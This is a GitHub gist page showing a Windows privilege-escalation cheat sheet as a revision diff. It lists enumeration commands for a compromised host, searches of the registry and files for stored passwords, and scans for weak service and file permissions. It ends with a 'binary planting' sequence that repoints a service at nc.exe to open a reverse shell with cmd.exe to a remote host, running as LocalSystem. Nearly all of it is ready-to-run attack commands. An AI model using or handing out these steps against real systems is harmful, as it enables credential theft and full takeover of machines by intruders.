Skip to content

Instantly share code, notes, and snippets.

@curiositysec

curiositysec/windows_privesc

Forked from sckalath/windows_privesc
Created February 13, 2018 09:02
Show Gist options
  • Save curiositysec/811b2712eee2e0c47cf7a5460fb99192 to your computer and use it in GitHub Desktop.
Save curiositysec/811b2712eee2e0c47cf7a5460fb99192 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @sckalath sckalath revised this gist Jul 14, 2014. 1 changed file with 82 additions and 1 deletion.
    83 changes: 82 additions & 1 deletion windows_privesc
    View file
    Original file line number Diff line number Diff line change
    @@ -1 +1,82 @@
    TODO: Add stuff.
    // What system are we connected to?
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

    // Get the hostname and username (if available)
    hostname
    echo %username%

    // Get users
    net users
    net user [username]

    // Networking stuff
    ipconfig /all

    // Printer?
    route print

    // ARP-arific
    arp -A

    // Active network connections
    netstat -ano

    // Firewall fun (Win XP SP2+ only)
    netsh firewall show state
    netsh firewall show config

    // Scheduled tasks
    schtasks /query /fo LIST /v

    // Running processes to started services
    tasklist /SVC
    net start

    // Driver madness
    DRIVERQUERY

    // WMIC fun (Win 7/8 -- XP requires admin)
    wmic /?
    # Use wmic_info script!

    // WMIC: check patch level
    wmic qfe get Caption,Description,HotFixID,InstalledOn

    // Search pathces for given patch
    wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

    // AlwaysInstallElevated fun
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

    // Other commands to run to hopefully get what we need
    dir /s *pass* == *cred* == *vnc* == *.config*
    findstr /si password *.xml *.ini *.txt
    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s

    // Service permissions
    sc query
    sc qc [service_name]

    // Accesschk stuff
    accesschk.exe /accepteula (always do this first!!!!!)
    accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
    accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
    accesschk.exe -ucqv [service_name]

    // Find all weak folder permissions per drive.
    accesschk.exe -uwdqs Users c:\
    accesschk.exe -uwdqs "Authenticated Users" c:\

    // Find all weak file permissions per drive.
    accesschk.exe -uwqs Users c:\*.*
    accesschk.exe -uwqs "Authenticated Users" c:\*.*

    // Binary planting
    sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
    sc config [service_name] obj= ".\LocalSystem" password= ""
    sc qc [service_name] (to verify!)
    net start [service_name]

    Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html
  2. @sckalath sckalath created this gist Jul 14, 2014.
    1 change: 1 addition & 0 deletions windows_privesc
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1 @@
    TODO: Add stuff.